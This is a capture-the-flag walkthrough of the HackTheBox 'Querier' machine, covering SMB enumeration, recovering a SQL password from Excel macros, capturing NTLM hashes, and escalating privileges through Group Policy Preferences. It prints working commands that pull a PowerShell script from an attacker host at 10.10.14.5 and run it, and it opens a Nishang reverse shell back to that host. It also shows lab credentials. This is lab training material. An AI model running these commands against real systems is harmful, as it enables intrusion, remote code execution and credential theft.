HackTheBox - Querier

Nmap scan results

No webserver running on this machine, so we can proceed with SMB Server. I will use smbmap and smbclient to enumerate samba shares.

Enumerating Samba Shares

Let's get all the content from the Reports share as we have READ ACCESS to it.

Extracting SQL Server password from Macros

If you will run binwalk on the xlsm file, you will find vbaProject.bin file which will probably contain Macros.

We can use olevba from oletools which can be installed by entering the following command.

pip install oletools

And we get SQL Server password having username as reporting and password as PcwTWTHRwryjc$c6

Enumerating SQL Server

To connect to SQL Server, we need mssqlclient.py from impacket module.

Now we can't run enable_xp_cmdshell due to insufficient privileges. You can extract the NTLM hash of the user making the service authenticate against you. Taken from here.

Now let's setup a Responder on tun0 interface and listen for incoming NTLM Hash. Other way can be to use smbserver from impacket to intercept the Hash. I will be using impacket's smbserver.

SQL> xp_dirtree "\\10.10.14.5\pleasework\" # Command to run in SQL Prompt
python3 /opt/impacket/examples/smbserver.py -smb2support pleasework $(pwd) # Setup samba server using impacket

Crack the password using hashcat. Now we can login into the SQL Server with the user mssql-svc

Getting reverse shell using Nishang

Get the Powershell reverse shell from nishang's github repository and modify it according to your needs. We need to add a command at the end of script for it to get executed as soon as we request it via HTTP Server.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 9001
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadString(\"http://10.10.14.5:8000/shell.ps1\")

Running PowerUp.ps1 for privilege escalation

Quick introduction to the PowerUp.ps1 script.

Image result for what is powerup.ps1 ps1 is a program that enables a user to perform quick checks against a Windows machine for any privilege escalation opportunities. It is not a comprehensive check against all known privilege escalation techniques, but it is often a good place to start when you are attempting to escalate local privileges.

We need to add Invoke-AllChecks at the end of the script for it to execute.

I tried UsoSvc to get administrator privileges, it did create a account named john having admin privileges, but it's not working.

Update Orchestrator Service(UsoSVC), as the name suggests, is responsible for downloading updates for the operating system and installing them after verifying. The service is a very important and an essential feature as the operating system needs to be updated constantly due to the new security and feature updates.

Exploiting Group Policy Preferences

We can try to search for Groups.xml file which contains Group Policy encrypted password. Read more about here.

We can decrypt this password using gpp-decrypt script which is available on github.

Now that we have password for administrator, we can use psexec.py or even do it manually using powershell. I will be using powershell for my practice.

$pass = Convertto-SecureString "MyUnclesAreMarioAndLuigi!!1!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('querier\administrator',$pass)
Invoke-Command -ComputerName QUERIER -Credential $cred -ScriptBlock {IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')}